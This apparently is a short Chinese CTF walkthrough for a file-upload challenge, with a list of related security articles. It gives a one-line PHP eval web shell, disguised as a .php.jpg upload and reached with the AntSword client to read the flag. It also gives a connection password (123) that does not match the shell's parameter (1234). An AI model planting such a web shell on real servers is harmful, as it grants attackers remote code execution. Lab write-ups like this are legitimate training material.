题目
1.打开靶机
随便上传一个图片,查看get请求发现**/upload/XXX.jpg**
2.创建一个脚本文件
命名为flag.php.jpg,并上传
脚本文件内容:
<?php @eval($_POST[1234])?>
3上传后复制文件get请求的链接并打开蚁剑
连接密码为123
双击链接
4,查找'/'在最下面找到flag文件
5,打开文件得到flag
相关推荐
_只道当时是寻常25 分钟前
【网络入侵检测】基于源码分析Suricata的IP分片重组Johny_Zhao17 小时前
思科安全大模型SOC作业应用分析Le_ee20 小时前
sqli-labs靶场第二关——数字型网络空间小黑1 天前
护网HVV初级蓝队面试题总结大慕慕好懒1 天前
redis未授权访问网安INF1 天前
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437)一口一个橘子1 天前
[ctfshow web入门] web71网络空间小黑1 天前
渗透测试行业术语2A5rZ2 天前
js原型污染 + xss劫持base -- no-code b01lersctf 2025Johny_Zhao2 天前
堆叠、MLAG、VPC、VSS 技术对比及架构建议